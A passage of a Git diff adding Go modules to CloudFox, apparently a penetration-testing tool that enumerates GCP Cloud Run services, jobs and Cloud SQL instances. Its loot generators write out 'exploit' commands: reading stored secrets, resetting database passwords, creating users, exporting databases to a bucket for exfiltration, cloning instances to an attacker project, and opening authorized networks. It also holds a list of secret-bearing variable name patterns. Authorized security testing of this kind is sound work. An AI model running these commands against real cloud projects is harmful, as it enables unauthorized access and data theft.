jobs + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + FoxMapperCache *gcpinternal.FoxMapperCache // FoxMapper graph data (preferred) + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// 
------------------------------ +type CloudRunOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o CloudRunOutput) TableFiles() []internal.TableFile { return o.Table } +func (o CloudRunOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPCloudRunCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_CLOUDRUN_MODULE_NAME) + if err != nil { + return + } + + module := &CloudRunModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectServices: make(map[string][]CloudRunService.ServiceInfo), + ProjectJobs: make(map[string][]CloudRunService.JobInfo), + LootMap: make(map[string]map[string]*internal.LootFile), + } + + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *CloudRunModule) Execute(ctx context.Context, logger internal.Logger) { + // Try to get FoxMapper cache (preferred - graph-based analysis) + m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + logger.InfoM("Using FoxMapper graph data for attack path analysis", globals.GCP_CLOUDRUN_MODULE_NAME) + } + + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_CLOUDRUN_MODULE_NAME, m.processProject) + + // Get all resources for stats + allServices := m.getAllServices() + allJobs := m.getAllJobs() + totalResources := len(allServices) + len(allJobs) + if totalResources == 0 { + logger.InfoM("No Cloud Run services or jobs found", globals.GCP_CLOUDRUN_MODULE_NAME) + return + } + + // Count public services + publicCount := 0 + for _, svc := range allServices { + if svc.IsPublic { + publicCount++ + } + } + + if publicCount > 0 { + logger.SuccessM(fmt.Sprintf("Found %d service(s), %d job(s), %d public", len(allServices), 
len(allJobs), publicCount), globals.GCP_CLOUDRUN_MODULE_NAME) + } else { + logger.SuccessM(fmt.Sprintf("Found %d service(s), %d job(s)", len(allServices), len(allJobs)), globals.GCP_CLOUDRUN_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +// getAllServices returns all services from all projects (for statistics) +func (m *CloudRunModule) getAllServices() []CloudRunService.ServiceInfo { + var all []CloudRunService.ServiceInfo + for _, services := range m.ProjectServices { + all = append(all, services...) + } + return all +} + +// getAllJobs returns all jobs from all projects (for statistics) +func (m *CloudRunModule) getAllJobs() []CloudRunService.JobInfo { + var all []CloudRunService.JobInfo + for _, jobs := range m.ProjectJobs { + all = append(all, jobs...) + } + return all +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *CloudRunModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating Cloud Run in project: %s", projectID), globals.GCP_CLOUDRUN_MODULE_NAME) + } + + cs := CloudRunService.New() + + // Initialize loot for this project + m.mu.Lock() + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["cloudrun-commands"] = &internal.LootFile{ + Name: "cloudrun-commands", + Contents: "# Cloud Run Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap[projectID]["cloudrun-secret-refs"] = &internal.LootFile{ + Name: "cloudrun-secret-refs", + Contents: "# Cloud Run Secret Manager References\n# Generated by CloudFox\n# Use: gcloud secrets versions access VERSION --secret=SECRET_NAME --project=PROJECT\n\n", + } + } + m.mu.Unlock() + + // Get services + services, err := cs.Services(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, 
logger, globals.GCP_CLOUDRUN_MODULE_NAME, + fmt.Sprintf("Could not enumerate Cloud Run services in project %s", projectID)) + } else { + m.mu.Lock() + m.ProjectServices[projectID] = services + for _, svc := range services { + m.addServiceToLoot(projectID, svc) + } + m.mu.Unlock() + } + + // Get jobs + jobs, err := cs.Jobs(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_CLOUDRUN_MODULE_NAME, + fmt.Sprintf("Could not enumerate Cloud Run jobs in project %s", projectID)) + } else { + m.mu.Lock() + m.ProjectJobs[projectID] = jobs + for _, job := range jobs { + m.addJobToLoot(projectID, job) + } + m.mu.Unlock() + } + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d service(s), %d job(s) in project %s", len(services), len(jobs), projectID), globals.GCP_CLOUDRUN_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *CloudRunModule) addServiceToLoot(projectID string, svc CloudRunService.ServiceInfo) { + commandsLoot := m.LootMap[projectID]["cloudrun-commands"] + secretRefsLoot := m.LootMap[projectID]["cloudrun-secret-refs"] + + if commandsLoot == nil { + return + } + + // All commands for this service + commandsLoot.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# SERVICE: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s, Region: %s\n"+ + "# Image: %s\n"+ + "# Service Account: %s\n"+ + "# Public: %v\n"+ + "# URL: %s\n\n"+ + "# === ENUMERATION COMMANDS ===\n\n"+ + "# Describe service:\n"+ + "gcloud run services describe %s --region=%s --project=%s\n"+ + "# Get IAM policy:\n"+ + "gcloud run services get-iam-policy %s --region=%s --project=%s\n"+ + "# List revisions:\n"+ + "gcloud run revisions list --service=%s --region=%s --project=%s\n\n"+ + "# === EXPLOIT COMMANDS 
===\n\n"+ + "# Invoke the service (if you have run.routes.invoke):\n"+ + "curl -H \"Authorization: Bearer $(gcloud auth print-identity-token)\" %s\n\n", + svc.Name, svc.ProjectID, svc.Region, + svc.ContainerImage, + svc.ServiceAccount, + svc.IsPublic, + svc.URL, + svc.Name, svc.Region, svc.ProjectID, + svc.Name, svc.Region, svc.ProjectID, + svc.Name, svc.Region, svc.ProjectID, + svc.URL, + ) + + // Add secret references to loot + if len(svc.SecretRefs) > 0 && secretRefsLoot != nil { + secretRefsLoot.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# SERVICE: %s (Project: %s, Region: %s)\n"+ + "# =============================================================================\n", svc.Name, svc.ProjectID, svc.Region) + for _, ref := range svc.SecretRefs { + if ref.Type == "env" { + secretRefsLoot.Contents += fmt.Sprintf( + "# Env var: %s\ngcloud secrets versions access %s --secret=%s --project=%s\n", + ref.EnvVarName, ref.SecretVersion, ref.SecretName, svc.ProjectID, + ) + } else { + secretRefsLoot.Contents += fmt.Sprintf( + "# Volume mount: %s\ngcloud secrets versions access latest --secret=%s --project=%s\n", + ref.MountPath, ref.SecretName, svc.ProjectID, + ) + } + } + secretRefsLoot.Contents += "\n" + } +} + +func (m *CloudRunModule) addJobToLoot(projectID string, job CloudRunService.JobInfo) { + commandsLoot := m.LootMap[projectID]["cloudrun-commands"] + secretRefsLoot := m.LootMap[projectID]["cloudrun-secret-refs"] + + if commandsLoot == nil { + return + } + + // All commands for this job + commandsLoot.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# JOB: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s, Region: %s\n"+ + "# Image: %s\n"+ + "# Service Account: %s\n\n"+ + "# === ENUMERATION COMMANDS ===\n\n"+ + "# Describe job:\n"+ + "gcloud run jobs describe %s 
--region=%s --project=%s\n"+ + "# List executions:\n"+ + "gcloud run jobs executions list --job=%s --region=%s --project=%s\n\n"+ + "# === EXPLOIT COMMANDS ===\n\n"+ + "# Execute the job (if you have run.jobs.run):\n"+ + "gcloud run jobs execute %s --region=%s --project=%s\n\n", + job.Name, job.ProjectID, job.Region, + job.ContainerImage, + job.ServiceAccount, + job.Name, job.Region, job.ProjectID, + job.Name, job.Region, job.ProjectID, + job.Name, job.Region, job.ProjectID, + ) + + // Add secret references to loot + if len(job.SecretRefs) > 0 && secretRefsLoot != nil { + secretRefsLoot.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# JOB: %s (Project: %s, Region: %s)\n"+ + "# =============================================================================\n", job.Name, job.ProjectID, job.Region) + for _, ref := range job.SecretRefs { + if ref.Type == "env" { + secretRefsLoot.Contents += fmt.Sprintf( + "# Env var: %s\ngcloud secrets versions access %s --secret=%s --project=%s\n", + ref.EnvVarName, ref.SecretVersion, ref.SecretName, job.ProjectID, + ) + } else { + secretRefsLoot.Contents += fmt.Sprintf( + "# Volume mount: %s\ngcloud secrets versions access latest --secret=%s --project=%s\n", + ref.MountPath, ref.SecretName, job.ProjectID, + ) + } + } + secretRefsLoot.Contents += "\n" + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *CloudRunModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Decide between hierarchical and flat output + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +// writeHierarchicalOutput writes output to per-project directories +func (m *CloudRunModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + // Build hierarchical output data + outputData := internal.HierarchicalOutputData{ + 
OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Collect all project IDs that have data + projectsWithData := make(map[string]bool) + for projectID := range m.ProjectServices { + projectsWithData[projectID] = true + } + for projectID := range m.ProjectJobs { + projectsWithData[projectID] = true + } + + // Build project-level outputs + for projectID := range projectsWithData { + services := m.ProjectServices[projectID] + jobs := m.ProjectJobs[projectID] + + tables := m.buildTablesForProject(projectID, services, jobs) + + // Collect loot for this project + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !isCloudRunEmptyLoot(loot.Contents) { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = CloudRunOutput{Table: tables, Loot: lootFiles} + } + + // Create path builder using the module's hierarchy + pathBuilder := m.BuildPathBuilder() + + // Write using hierarchical output + err := internal.HandleHierarchicalOutputSmart( + "gcp", + m.Format, + m.Verbosity, + m.WrapTable, + pathBuilder, + outputData, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_CLOUDRUN_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// writeFlatOutput writes all output to a single directory (legacy mode) +func (m *CloudRunModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allServices := m.getAllServices() + allJobs := m.getAllJobs() + + tables := m.buildTablesForProject("", allServices, allJobs) + + // Collect all loot files + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !isCloudRunEmptyLoot(loot.Contents) { + lootFiles = append(lootFiles, *loot) + } + } + } + + output 
:= CloudRunOutput{ + Table: tables, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_CLOUDRUN_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// isCloudRunEmptyLoot checks if a loot file contains only the header +func isCloudRunEmptyLoot(contents string) bool { + return strings.HasSuffix(contents, "# WARNING: Only use with proper authorization\n\n") || + strings.HasSuffix(contents, "# Use: gcloud secrets versions access VERSION --secret=SECRET_NAME --project=PROJECT\n\n") +} + +// buildTablesForProject builds all tables for a given project's services and jobs +func (m *CloudRunModule) buildTablesForProject(projectID string, services []CloudRunService.ServiceInfo, jobs []CloudRunService.JobInfo) []internal.TableFile { + tableFiles := []internal.TableFile{} + + // Services table + servicesHeader := []string{ + "Project", "Type", "Name", "Region", "Status", "URL", "Ingress", "Public", + "Service Account", "SA Attack Paths", "Default SA", "Image", "VPC Access", + "Min/Max", "IAM Binding Role", "IAM Binding Principal", + } + + var servicesBody [][]string + for _, svc := range services { + publicStatus := "No" + if svc.IsPublic { + publicStatus = "Yes" + } + defaultSA := "No" + if svc.UsesDefaultSA { + defaultSA = "Yes" + } + vpcAccess := "-" + if svc.VPCAccess != "" { + vpcAccess = extractName(svc.VPCAccess) + if svc.VPCEgressSettings != "" { + vpcAccess += fmt.Sprintf(" (%s)", strings.TrimPrefix(svc.VPCEgressSettings, "VPC_EGRESS_")) + } + } + scaling := fmt.Sprintf("%d/%d", svc.MinInstances, svc.MaxInstances) + + status := svc.Status + if status == "" { + status = "-" + } + + // Check attack 
paths (privesc/exfil/lateral) for the service account + attackPaths := "run foxmapper" + if svc.ServiceAccount != "" { + attackPaths = gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, svc.ServiceAccount) + } else if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + attackPaths = "No SA" + } + + // If service has IAM bindings, create one row per binding + if len(svc.IAMBindings) > 0 { + for _, binding := range svc.IAMBindings { + servicesBody = append(servicesBody, []string{ + m.GetProjectName(svc.ProjectID), "Service", svc.Name, svc.Region, status, svc.URL, + formatIngress(svc.IngressSettings), publicStatus, svc.ServiceAccount, + attackPaths, defaultSA, svc.ContainerImage, vpcAccess, scaling, + binding.Role, binding.Member, + }) + } + } else { + // Service has no IAM bindings - single row + servicesBody = append(servicesBody, []string{ + m.GetProjectName(svc.ProjectID), "Service", svc.Name, svc.Region, status, svc.URL, + formatIngress(svc.IngressSettings), publicStatus, svc.ServiceAccount, + attackPaths, defaultSA, svc.ContainerImage, vpcAccess, scaling, + "-", "-", + }) + } + } + + if len(servicesBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_CLOUDRUN_MODULE_NAME + "-services", + Header: servicesHeader, + Body: servicesBody, + }) + } + + // Jobs table + jobsHeader := []string{ + "Project", "Type", "Name", "Region", "Status", "Service Account", "SA Attack Paths", "Default SA", + "Image", "VPC Access", "Tasks", "Parallelism", "Last Execution", + "IAM Binding Role", "IAM Binding Principal", + } + + var jobsBody [][]string + for _, job := range jobs { + defaultSA := "No" + if job.UsesDefaultSA { + defaultSA = "Yes" + } + lastExec := "-" + if job.LastExecution != "" { + lastExec = extractName(job.LastExecution) + } + + status := job.Status + if status == "" { + status = "-" + } + + vpcAccess := "-" + if job.VPCAccess != "" { + vpcAccess = extractName(job.VPCAccess) + if job.VPCEgressSettings != "" { + 
vpcAccess += fmt.Sprintf(" (%s)", strings.TrimPrefix(job.VPCEgressSettings, "VPC_EGRESS_")) + } + } + + // Check attack paths (privesc/exfil/lateral) for the service account + jobAttackPaths := "run foxmapper" + if job.ServiceAccount != "" { + jobAttackPaths = gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, job.ServiceAccount) + } else if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + jobAttackPaths = "No SA" + } + + // If job has IAM bindings, create one row per binding + if len(job.IAMBindings) > 0 { + for _, binding := range job.IAMBindings { + jobsBody = append(jobsBody, []string{ + m.GetProjectName(job.ProjectID), "Job", job.Name, job.Region, status, + job.ServiceAccount, jobAttackPaths, defaultSA, job.ContainerImage, vpcAccess, + fmt.Sprintf("%d", job.TaskCount), fmt.Sprintf("%d", job.Parallelism), + lastExec, binding.Role, binding.Member, + }) + } + } else { + // Job has no IAM bindings - single row + jobsBody = append(jobsBody, []string{ + m.GetProjectName(job.ProjectID), "Job", job.Name, job.Region, status, + job.ServiceAccount, jobAttackPaths, defaultSA, job.ContainerImage, vpcAccess, + fmt.Sprintf("%d", job.TaskCount), fmt.Sprintf("%d", job.Parallelism), + lastExec, "-", "-", + }) + } + } + + if len(jobsBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_CLOUDRUN_MODULE_NAME + "-jobs", + Header: jobsHeader, + Body: jobsBody, + }) + } + + // Secrets table (includes hardcoded secrets and environment variables) + secretsHeader := []string{ + "Project", "Resource Type", "Name", "Region", "Env Var", "Value/Type", "Source", "Sensitive", + } + + var secretsBody [][]string + + // Add environment variables + for _, svc := range services { + for _, env := range svc.EnvVars { + sensitive := isSensitiveEnvVar(env.Name) + if env.Source == "direct" { + secretsBody = append(secretsBody, []string{ + m.GetProjectName(svc.ProjectID), "Service", + svc.Name, svc.Region, env.Name, env.Value, "EnvVar", sensitive, 
+ }) + } else { + secretsBody = append(secretsBody, []string{ + m.GetProjectName(svc.ProjectID), "Service", + svc.Name, svc.Region, env.Name, fmt.Sprintf("%s:%s", env.SecretName, env.SecretVersion), "SecretManager", sensitive, + }) + } + } + } + for _, job := range jobs { + for _, env := range job.EnvVars { + sensitive := isSensitiveEnvVar(env.Name) + if env.Source == "direct" { + secretsBody = append(secretsBody, []string{ + m.GetProjectName(job.ProjectID), "Job", + job.Name, job.Region, env.Name, env.Value, "EnvVar", sensitive, + }) + } else { + secretsBody = append(secretsBody, []string{ + m.GetProjectName(job.ProjectID), "Job", + job.Name, job.Region, env.Name, fmt.Sprintf("%s:%s", env.SecretName, env.SecretVersion), "SecretManager", sensitive, + }) + } + } + } + + if len(secretsBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_CLOUDRUN_MODULE_NAME + "-secrets", + Header: secretsHeader, + Body: secretsBody, + }) + } + + return tableFiles +} + +// Helper functions + +// formatIngress formats ingress settings for display +func formatIngress(ingress string) string { + switch ingress { + case "INGRESS_TRAFFIC_ALL": + return "ALL (Public)" + case "INGRESS_TRAFFIC_INTERNAL_ONLY": + return "INTERNAL" + case "INGRESS_TRAFFIC_INTERNAL_LOAD_BALANCER": + return "INT+LB" + default: + return ingress + } +} + +// extractName extracts just the name from a resource path +func extractName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} + +// sensitiveEnvVarPatterns contains patterns that indicate sensitive env vars +var sensitiveEnvVarPatterns = []string{ + "PASSWORD", "PASSWD", "SECRET", "API_KEY", "APIKEY", "API-KEY", + "TOKEN", "ACCESS_TOKEN", "AUTH_TOKEN", "BEARER", "CREDENTIAL", + "PRIVATE_KEY", "PRIVATEKEY", "CONNECTION_STRING", "CONN_STR", + "DATABASE_URL", "DB_PASSWORD", "DB_PASS", "MYSQL_PASSWORD", + "POSTGRES_PASSWORD", "REDIS_PASSWORD", 
"MONGODB_URI", + "AWS_ACCESS_KEY", "AWS_SECRET", "AZURE_KEY", "GCP_KEY", + "ENCRYPTION_KEY", "SIGNING_KEY", "JWT_SECRET", "SESSION_SECRET", + "OAUTH", "CLIENT_SECRET", +} + +// isSensitiveEnvVar checks if an environment variable name indicates sensitive data +func isSensitiveEnvVar(envName string) string { + envNameUpper := strings.ToUpper(envName) + for _, pattern := range sensitiveEnvVarPatterns { + if strings.Contains(envNameUpper, pattern) { + return "Yes" + } + } + return "No" +} + diff --git a/gcp/commands/cloudsql.go b/gcp/commands/cloudsql.go new file mode 100644 index 00000000..0bb1dc58 --- /dev/null +++ b/gcp/commands/cloudsql.go @@ -0,0 +1,563 @@ +package commands + +import ( + "github.com/BishopFox/cloudfox/gcp/shared" + "context" + "fmt" + "strings" + "sync" + + CloudSQLService "github.com/BishopFox/cloudfox/gcp/services/cloudsqlService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPCloudSQLCommand = &cobra.Command{ + Use: globals.GCP_CLOUDSQL_MODULE_NAME, + Aliases: []string{"sql", "database", "db"}, + Short: "Enumerate Cloud SQL instances with security analysis", + Long: `Enumerate Cloud SQL instances across projects with security-relevant details. 
+ +Features: +- Lists all Cloud SQL instances (MySQL, PostgreSQL, SQL Server) +- Shows network configuration (public/private IP, authorized networks) +- Identifies publicly accessible databases +- Shows SSL/TLS configuration and requirements +- Checks backup and high availability configuration +- Shows encryption type (Google-managed vs CMEK) +- Shows IAM database authentication status +- Shows password policy configuration +- Shows maintenance window settings +- Shows point-in-time recovery status +- Identifies common security misconfigurations +- Generates gcloud commands for further analysis + +Security Columns: +- PublicIP: Whether the instance has a public IP address +- RequireSSL: Whether SSL/TLS is required for connections +- AuthNetworks: Number of authorized network ranges +- Backups: Automated backup status +- PITR: Point-in-time recovery status +- Encryption: CMEK or Google-managed +- IAM Auth: IAM database authentication +- PwdPolicy: Password validation policy +- HA: High availability configuration +- Issues: Detected security misconfigurations + +Attack Surface: +- Public IPs expose database to internet scanning +- Missing SSL allows credential sniffing +- 0.0.0.0/0 in authorized networks = world accessible +- Default service accounts may have excessive permissions +- Google-managed encryption may not meet compliance +- Missing password policy allows weak passwords`, + Run: runGCPCloudSQLCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type CloudSQLModule struct { + gcpinternal.BaseGCPModule + + // Module-specific fields - per-project for hierarchical output + ProjectInstances map[string][]CloudSQLService.SQLInstanceInfo // projectID -> instances + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type CloudSQLOutput struct { + Table []internal.TableFile + Loot 
[]internal.LootFile +} + +func (o CloudSQLOutput) TableFiles() []internal.TableFile { return o.Table } +func (o CloudSQLOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPCloudSQLCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_CLOUDSQL_MODULE_NAME) + if err != nil { + return + } + + module := &CloudSQLModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectInstances: make(map[string][]CloudSQLService.SQLInstanceInfo), + LootMap: make(map[string]map[string]*internal.LootFile), + } + + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *CloudSQLModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_CLOUDSQL_MODULE_NAME, m.processProject) + + // Get all instances for stats + allInstances := m.getAllInstances() + if len(allInstances) == 0 { + logger.InfoM("No Cloud SQL instances found", globals.GCP_CLOUDSQL_MODULE_NAME) + return + } + + // Count public instances + publicCount := 0 + for _, instance := range allInstances { + if instance.HasPublicIP { + publicCount++ + } + } + + if publicCount > 0 { + logger.SuccessM(fmt.Sprintf("Found %d instance(s), %d with public IP", len(allInstances), publicCount), globals.GCP_CLOUDSQL_MODULE_NAME) + } else { + logger.SuccessM(fmt.Sprintf("Found %d instance(s)", len(allInstances)), globals.GCP_CLOUDSQL_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +// getAllInstances returns all instances from all projects (for statistics) +func (m *CloudSQLModule) getAllInstances() []CloudSQLService.SQLInstanceInfo { + var all []CloudSQLService.SQLInstanceInfo + for _, instances := range m.ProjectInstances { + all = append(all, instances...) 
+ } + return all +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *CloudSQLModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating Cloud SQL instances in project: %s", projectID), globals.GCP_CLOUDSQL_MODULE_NAME) + } + + cs := CloudSQLService.New() + instances, err := cs.Instances(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_CLOUDSQL_MODULE_NAME, + fmt.Sprintf("Could not enumerate Cloud SQL in project %s", projectID)) + return + } + + // Thread-safe store per-project + m.mu.Lock() + m.ProjectInstances[projectID] = instances + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["cloudsql-commands"] = &internal.LootFile{ + Name: "cloudsql-commands", + Contents: "# Cloud SQL Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + + for _, instance := range instances { + m.addInstanceToLoot(projectID, instance) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d instance(s) in project %s", len(instances), projectID), globals.GCP_CLOUDSQL_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *CloudSQLModule) addInstanceToLoot(projectID string, instance CloudSQLService.SQLInstanceInfo) { + lootFile := m.LootMap[projectID]["cloudsql-commands"] + if lootFile == nil { + return + } + + dbType := getDatabaseType(instance.DatabaseVersion) + connectionInstance := fmt.Sprintf("%s:%s:%s", instance.ProjectID, instance.Region, instance.Name) + + publicIP := instance.PublicIP + if publicIP == "" { + publicIP = "-" + } + + lootFile.Contents += fmt.Sprintf( 
+ "# =============================================================================\n"+ + "# CLOUD SQL: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s, Region: %s\n"+ + "# Version: %s\n"+ + "# Public IP: %s\n", + instance.Name, + instance.ProjectID, instance.Region, + instance.DatabaseVersion, + publicIP, + ) + + // gcloud commands + lootFile.Contents += "# === ENUMERATION COMMANDS ===\n\n" + lootFile.Contents += fmt.Sprintf( + "gcloud sql instances describe %s --project=%s\n"+ + "gcloud sql databases list --instance=%s --project=%s\n"+ + "gcloud sql users list --instance=%s --project=%s\n", + instance.Name, instance.ProjectID, + instance.Name, instance.ProjectID, + instance.Name, instance.ProjectID, + ) + + // Connection commands based on database type + switch dbType { + case "mysql": + if instance.PublicIP != "" { + lootFile.Contents += fmt.Sprintf( + "mysql -h %s -u root -p\n", + instance.PublicIP, + ) + } + lootFile.Contents += fmt.Sprintf( + "cloud_sql_proxy -instances=%s=tcp:3306\n", + connectionInstance, + ) + case "postgres": + if instance.PublicIP != "" { + lootFile.Contents += fmt.Sprintf( + "psql -h %s -U postgres\n", + instance.PublicIP, + ) + } + lootFile.Contents += fmt.Sprintf( + "cloud_sql_proxy -instances=%s=tcp:5432\n", + connectionInstance, + ) + case "sqlserver": + if instance.PublicIP != "" { + lootFile.Contents += fmt.Sprintf( + "sqlcmd -S %s -U sqlserver\n", + instance.PublicIP, + ) + } + lootFile.Contents += fmt.Sprintf( + "cloud_sql_proxy -instances=%s=tcp:1433\n", + connectionInstance, + ) + } + + // === EXPLOIT COMMANDS === + lootFile.Contents += "\n# === EXPLOIT COMMANDS ===\n\n" + + // Password reset + lootFile.Contents += fmt.Sprintf( + "# Reset database user password (requires cloudsql.users.update):\n"+ + "gcloud sql users set-password root --host=%% --instance=%s --project=%s --password=NEW_PASSWORD\n"+ + "gcloud sql users set-password postgres --instance=%s 
--project=%s --password=NEW_PASSWORD\n\n", + instance.Name, instance.ProjectID, + instance.Name, instance.ProjectID, + ) + + // Create new user + lootFile.Contents += fmt.Sprintf( + "# Create a new database user (requires cloudsql.users.create):\n"+ + "gcloud sql users create cloudfox_user --instance=%s --project=%s --password=GENERATED_PASSWORD\n\n", + instance.Name, instance.ProjectID, + ) + + // Backup exfiltration + lootFile.Contents += fmt.Sprintf( + "# List existing backups:\n"+ + "gcloud sql backups list --instance=%s --project=%s\n\n"+ + "# Create a new backup (for exfiltration):\n"+ + "gcloud sql backups create --instance=%s --project=%s\n\n"+ + "# Export database to GCS bucket (data exfiltration):\n"+ + "gcloud sql export sql %s gs://BUCKET_NAME/export-%s.sql --database=DATABASE_NAME --project=%s\n"+ + "gcloud sql export csv %s gs://BUCKET_NAME/export-%s.csv --database=DATABASE_NAME --query=\"SELECT * FROM TABLE_NAME\" --project=%s\n\n", + instance.Name, instance.ProjectID, + instance.Name, instance.ProjectID, + instance.Name, instance.Name, instance.ProjectID, + instance.Name, instance.Name, instance.ProjectID, + ) + + // Clone instance + lootFile.Contents += fmt.Sprintf( + "# Clone instance to attacker-controlled project (requires cloudsql.instances.clone):\n"+ + "gcloud sql instances clone %s %s-clone --project=%s\n\n", + instance.Name, instance.Name, instance.ProjectID, + ) + + // IAM authentication exploitation + if instance.IAMAuthentication { + lootFile.Contents += fmt.Sprintf( + "# IAM database authentication is enabled - connect using SA token:\n"+ + "gcloud sql generate-login-token | %s\n\n", + func() string { + switch dbType { + case "mysql": + return fmt.Sprintf("mysql -h %s -u SA_EMAIL --enable-cleartext-plugin --password=$(cat -)", connectionInstance) + case "postgres": + return fmt.Sprintf("PGPASSWORD=$(cat -) psql -h %s -U SA_EMAIL", connectionInstance) + default: + return "# Use the token as password for database connection" + } + }(), + 
) + } + + // Authorized network manipulation + lootFile.Contents += fmt.Sprintf( + "# Add your IP to authorized networks (requires cloudsql.instances.update):\n"+ + "gcloud sql instances patch %s --project=%s --authorized-networks=YOUR_IP/32\n\n", + instance.Name, instance.ProjectID, + ) + + // Surface security issues if any were detected + if len(instance.SecurityIssues) > 0 { + lootFile.Contents += "# Security Issues:\n" + for _, issue := range instance.SecurityIssues { + lootFile.Contents += fmt.Sprintf("# - %s\n", issue) + } + } + + lootFile.Contents += "\n" +} + +// getDatabaseType returns the database type from version string +func getDatabaseType(version string) string { + switch { + case strings.HasPrefix(version, "MYSQL"): + return "mysql" + case strings.HasPrefix(version, "POSTGRES"): + return "postgres" + case strings.HasPrefix(version, "SQLSERVER"): + return "sqlserver" + default: + return "unknown" + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *CloudSQLModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Decide between hierarchical and flat output + if m.Hierarchy != nil && 